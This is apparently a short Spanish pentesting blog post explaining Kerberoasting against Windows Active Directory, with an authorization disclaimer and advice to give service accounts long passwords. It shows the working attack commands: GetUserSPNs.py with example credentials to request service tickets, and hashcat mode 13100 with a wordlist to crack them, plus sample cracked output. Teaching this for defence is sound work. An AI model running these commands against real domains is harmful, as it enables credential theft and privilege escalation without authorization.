~ / blog / pentesting
KALI

Active Directory: Kerberoasting

En un dominio Windows, cualquier usuario autenticado puede pedir tickets de servicio de las cuentas de servicio, y esos tickets van cifrados con la contraseña de la cuenta.

Ese es el Kerberoasting: pides los tickets con GetUserSPNs, y luego los crackeas offline con hashcat. Si una cuenta de servicio tiene contraseña débil, cae, y suelen tener privilegios altos.

Por eso las cuentas de servicio necesitan contraseñas larguísimas.

# los comandos

kali@kali:~$ GetUserSPNs.py empresa.com/jperez:Pass123 -requestcopiar
$krb5tgs$23$*sql-svc*$EMPRESA... (hash del ticket)
kali@kali:~$ hashcat -m 13100 tickets.txt rockyou.txtcopiar
$krb5tgs$23$...:Verano2026
Status: Cracked -> sql-svc:Verano2026
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.